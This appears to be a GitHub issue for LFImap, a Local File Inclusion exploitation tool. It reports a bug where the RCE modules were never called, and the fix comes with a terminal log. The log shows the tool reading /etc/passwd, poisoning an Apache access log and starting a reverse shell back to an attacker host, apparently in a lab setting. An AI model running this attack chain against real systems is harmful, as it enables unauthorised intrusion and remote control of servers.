hansmach1ne / LFImap

Local File Inclusion discovery and exploitation tool
Apache License 2.0

'-t' RCE modules are not initialized at all #95

Closed hansmach1ne closed 1 week ago

hansmach1ne commented 1 week ago

pwn() is not called when the '-t' module finds the vulnerability

hansmach1ne commented 1 week ago

Fixed in https://github.com/hansmach1ne/LFImap/commit/dae069404ef1b704ccb238db117a05f02635edcd

└─$ python3 lfimap.py -U "94.237.63.201:50722?language" -t --lhost 10.10.15.203 --lport 99 -x -P "127.0.0.1:8080"

[i] Testing GET 'language' parameter...
[+] LFI -> 'http://94.237.63.201:50722?language=/etc/passwd'
[?] Checking if bash is available on the target system...
[*] Starting reverse listener on 0.0.0.0:99
[i] Enumerating file system to discover access log location...

[.] Located canary in target's access log at '/var/log/apache2/access.log'
[.] Poisoning access log with the shell code... 
[.] Trying to pop reverse shell to 10.10.15.203:99 using bash via access log poisoning...
[.] Executing stage 1 of the revshell payload...
[.] Executing stage 2 of the revshell payload. Check your listener...
<SNIP>